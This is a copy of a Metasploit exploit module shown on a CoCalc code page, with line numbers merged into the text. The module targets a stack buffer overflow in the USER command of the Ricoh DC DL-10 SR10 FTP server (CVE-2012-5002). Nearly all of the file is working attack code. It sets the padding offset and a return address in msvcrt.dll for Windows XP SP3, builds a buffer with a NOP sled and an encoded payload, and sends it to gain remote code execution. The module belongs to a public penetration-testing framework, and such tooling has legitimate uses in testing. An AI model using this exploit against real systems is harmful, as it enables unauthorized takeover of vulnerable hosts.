CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/ftp/ricoh_dl_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Ftp910def initialize(info={})11super(update_info(info,12'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",13'Description' => %q{14This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP15service. By supplying a long string of data to the USER command, it is16possible to trigger a stack-based buffer overflow, which allows remote code17execution under the context of the user.1819Please note that in order to trigger the vulnerability, the server must20be configured with a log file name (by default, it's disabled).21},22'License' => MSF_LICENSE,23'Author' =>24[25'Julien Ahrens', #Discovery, PoC26'sinn3r' #Metasploit27],28'References' =>29[30['CVE', '2012-5002'],31['OSVDB', '79691'],32['URL', 'http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/'],33['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']34],35'Payload' =>36{37# Yup, no badchars38'BadChars' => "\x00",39},40'DefaultOptions' =>41{42'EXITFUNC' => "process",43},44'Platform' => 'win',45'Targets' =>46[47[48'Windows XP SP3',49{50'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)51'Offset' => 24552}53]54],55'Privileged' => false,56'DisclosureDate' => '2012-03-01',57'DefaultTarget' => 0))5859# We're triggering the bug via the USER command, no point to have user/pass60# as configurable options.61deregister_options('FTPPASS', 'FTPUSER')62end6364def check65connect66disconnect67if banner =~ /220 DSC ftpd 1\.0 FTP Server/68return Exploit::CheckCode::Appears69else70return Exploit::CheckCode::Safe71end72end7374def exploit75buf = ''76buf << rand_text_alpha(target['Offset'], payload_badchars)77buf << [target.ret].pack('V')78buf << make_nops(20)79buf << payload.encoded8081print_status("#{rhost}:#{rport} - Sending #{self.name}")82connect83send_user(buf)84handler85disconnect86end87end8889=begin900:002> lmv m SR1091start end module name9200400000 00410000 SR10 (deferred)93Image path: C:\Program Files\DC Software\SR10.exe94Image name: SR10.exe95Timestamp: Mon May 19 23:55:32 2008 (483275E4)96CheckSum: 0000000097ImageSize: 0001000098File version: 1.0.0.52099Product version: 1.0.0.0100File flags: 0 (Mask 3F)101File OS: 4 Unknown Win32102File type: 1.0 App103File date: 00000000.00000000104Translations: 0409.04b0105CompanyName: Ricoh Co.,Ltd.106ProductName: SR-10107InternalName: SR-10108OriginalFilename: SR10.EXE109ProductVersion: 1, 0, 0, 0110FileVersion: 1, 0, 0, 520111PrivateBuild: 1, 0, 0, 520112SpecialBuild: 1, 0, 0, 520113FileDescription: SR-10114115116Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most117stable component we can use is msvcrt.dll for now.118=end119120121122